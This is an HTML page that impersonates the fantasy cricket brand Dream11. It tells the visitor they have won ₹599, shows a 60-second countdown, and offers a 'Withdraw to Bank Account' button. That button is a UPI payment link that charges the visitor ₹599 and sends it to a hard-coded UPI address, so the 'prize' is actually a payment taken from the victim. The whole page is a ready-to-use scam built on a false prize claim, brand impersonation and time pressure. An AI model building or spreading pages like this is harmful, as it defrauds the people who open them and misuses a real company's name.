
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Dream11 - Winning Page</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f5f5f5;
      text-align: center;
      padding: 50px;
      color: #333;
    }
    .container {
      background-color: white;
      padding: 30px;
      border-radius: 12px;
      box-shadow: 0 0 10px rgba(0,0,0,0.1);
      display: inline-block;
    }
    h1 {
      color: #e40046;
    }
    #timer {
      font-size: 28px;
      color: #ff5722;
      margin: 20px 0;
    }
    .upi-button {
      display: inline-block;
      padding: 12px 25px;
      font-size: 18px;
      color: white;
      background-color: #e40046;
      border: none;
      border-radius: 8px;
      text-decoration: none;
    }
    .upi-button:hover {
      background-color: #c3003b;
    }
  </style>
</head>
<body>
  <div class="container">
    <h1>Congratulations! You have won ₹599</h1>
    <p id="timer">01:00</p>
    <a class="upi-button" href="upi://pay?pa=netc.34161fa820328aa2ccbf6860@mairtel&pn=Dream11+Fantasy+Cricket&am=599&tn=Dream11+Fantasy+Cricket">
      Withdraw to Bank Account
    </a>
  </div>

  <script>
    let time = 60;
    const timerElement = document.getElementById('timer');
    const countdown = setInterval(() => {
      time--;
      const minutes = Math.floor(time / 60);
      const seconds = time % 60;
      timerElement.textContent = `${String(minutes).padStart(2, '0')}:${String(seconds).padStart(2, '0')}`;
      if (time <= 0) clearInterval(countdown);
    }, 1000);
  </script>
</body>
</html>
